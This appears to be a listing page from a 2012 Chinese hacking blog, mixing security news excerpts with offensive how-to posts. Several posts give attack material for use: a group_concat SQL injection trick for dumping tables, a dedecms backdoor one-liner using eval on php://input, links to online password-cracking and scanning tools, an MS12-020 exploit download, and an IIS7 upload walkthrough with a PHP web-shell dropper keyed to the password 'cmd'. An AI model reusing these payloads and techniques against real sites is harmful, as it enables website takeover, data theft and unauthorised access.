php mysql注入的一种快速有效union方法select出数据库内容

分类:安全 | 2012-03-23 | 撸过 452 次
0人扯谈

php sql injector的时候,很多情况下都是显示一行一行的数据,要一次得到全部数据或者表格,那就的重复多次。

 

函数group_concat可以实现将表格放入一个单元格中(即仅有一行一列)

 

例如:

 

select group_concat(id,0x7c,name,0x7c,tel,0x5d) from g

 

那么将得到:

 

1|张三|83023023],|李四|13893232322],.....

 

(注意上面查询结果不是一行多列,而是一行一列)

 

假设原来的sql注入[......]

继续阅读

dedecms 5.7 一句话后门利用 exp

分类:安全 | 2012-03-22 | 撸过 828 次
0人扯谈

author:舞林

tx微博:http://t.qq.com/wulinlw

晚上看到这个

http://www.wooyun.org/bug.php?action=view&id=5416

shopcar.class.php 被植入一句话

@eval(file_get_contents('php://input'));

去官网下了一套回来,看了下代码,

class MemberShops
{
    var $OrdersId;
    var $productsId;
    function __construct()
    {
        $this->Orders[......]

继续阅读

在线渗透测试工具集合

分类:安全 | 2012-03-22 | 撸过 1,132 次
1人扯谈

家试试看吧,呵呵,不过下面那个破解wordpress密码的还能用

在线端口扫描:

http://scan.subhashdasyam.com/port-scanner.php

在线VNC扫描:

http://scan.subhashdasyam.com/dumper-with-login.php

在线SSH扫描:

http://scan.subhashdasyam.com/ssh-scanner.php

在线后台地址扫描:

http://scan.subhashdasyam.com/admin-page-finder.php

在线Wordpress管理员密码破解:

http[......]

继续阅读

我国大陆去年2807个政府网站遭篡改

分类:新闻 | 2012-03-20 | 撸过 359 次
0人扯谈

国家互联网应急中心(CNCERT)今天在此间发布的《2011年中国互联网网络安全态势报告》(以下简称“报告”)指出:2011年,我国遭受更为严重复杂的境外网络攻击,网络银行和工业控制系统安全收到的威胁显著上升,恶意程序引发的手机安全事件呈现多发态势。

  ■ 境外攻击来源美国居首

  报告指出,2011年,我国遭受境外网络攻击持续增多,境外有近4.7万个IP地址作为木马或僵尸网络控制服务器,控制我国境内近890万台主机,比2010年控制主机数增长近1倍,其中美国以9500多个IP地址控制我国境内近885万台主机,高居榜首。网站安全方面,境外1.18万多个IP通过植入后门对境内近1.06万个[......]

继续阅读

Anonymous宣称3月31日将使全球互联网瘫痪

分类:新闻 | 2012-03-20 | 撸过 356 次
0人扯谈

黑客组织匿名者(Anonymous)近日对外宣称,将于3月31日攻击13个DNS根服务器,已达到让全球互联网瘫痪的目的,此次攻击作为其发起的“Operation Global Blackout”行动的一部分,是为了抗议“SOPA(美国《网络反盗版法案》)和为了一己私利而置世界于饥饿之中的华尔街银行家与资本家们”。

SOPA/PIPA法案希望进一步强化保护知识产权的力度,当版权方发现侵犯版权内容时,可以要求网站(包括搜索引擎、支付平台、广告平台等)屏蔽所有内容,甚至可以要求互联网接入服务商(ISP)停止向网站提供服务,随后再进行司法程序。并且它规定如果没有"事先采取防盗版的措施",也就是事先[......]

继续阅读

微软或其安全合作伙伴外泄恶性代码

分类:新闻 | 2012-03-18 | 撸过 374 次
0人扯谈

去年有人向微软所提交的一个Windows系统高危漏洞代码现在不知怎么回事居然外泄了,但是目前还不知道通过微软自己还是它的安全合作伙伴之一外泄的。 这个漏洞针对的Windows远程桌面的一个弱点,使攻击者可以完全控制整个系统并且很容易扩散到其他电脑的远程桌面之上。

Microsoft-campus

微软在本周早些时候曾为这个漏洞发布了一个补丁,但是仅仅在几天之后国内网站就爆出了一个被称为"rdpclient.exe"的程序文件。独立安全研究人员Luigi Auriemma在去年8月时首个向微软提交了这个漏洞,不过看这个文件里内容就会发现其这个“漏洞的描述很是模糊,并且使用的是预建的数据包”--这些数据包也是他原先提[......]

继续阅读

Anonymous 否认 Anonymous-OS 出自其手

分类:新闻 | 2012-03-17 | 撸过 384 次
0人扯谈

之前曾被报道过的基于 Ubuntu11.10, 由匿名组织 Anonymous 制作的 Anonymous-OS 被证实并非出自 Anonymous 之手。由于无法确认作者,因此无法确认该操作系统的安全性。SourceForge 在该项目出现后关闭了此项目。也请下载了此 CD 的用户注意安全。

 

之前被众多网站所报道的 Anonymous-OS 自称是一个基于 Ubuntu 11.10 的 LiveCD, 附带许多黑客工具,“用来测试网站安全性的”工具。但事实证明,这个 LiveCD 并非真正出于 Anonymous 之手。该操作系统的作者伪装成 Anonymous 的一员,并[......]

继续阅读

微软最新安全漏洞遭泄露 漏洞分享项目受质疑

分类:新闻 | 2012-03-17 | 撸过 406 次
0人扯谈

据路透社报道,由于中国一家黑客网站公布了微软一个安全漏洞的攻击方式,使得微软的安全漏洞分享信息流程遭到猛烈抨击。微软一般会提前向70多家安全公司透露新发现的重大漏洞,此次被称为“概念验证”(proof-of-concept)的代码漏洞可能就是由其中一家安全公司泄露的。

 

微软表示,它正在对此展开调查,并“将采取必要行动保护消费者,并确保分享的机密信息按照合同和项目的要求进行保护“。微软的可信赖计算工作主管Yunsun Wee表示,“概念验证”代码的细节与微软向主动防御项目合作伙伴透露的漏洞信息吻合。

 

微软于2008年启动主动防御项目,提前告知各安全公司将要发布[......]

继续阅读

MS12-020 利用工具EXE版

分类:工具 | 2012-03-16 | 撸过 1,733 次
2人扯谈

不解释

 

下载地址:MS12-020.rar

文件大小:73 KB

IIS7.0 php错误文件解析漏洞利用实例

分类:安全 | 2012-03-16 | 撸过 730 次
0人扯谈

得到www.webshell.cc(仅为举例,非真实)web服务为IIS7.0

www.webshell.cc/robots.txt后面加上/任意字符.php成功解析为php

注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马

<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>

如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话,密码cmd

上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用菜刀[......]

继续阅读

第 20 页,共 70 页« 最新...10...1819202122...304050...最旧 »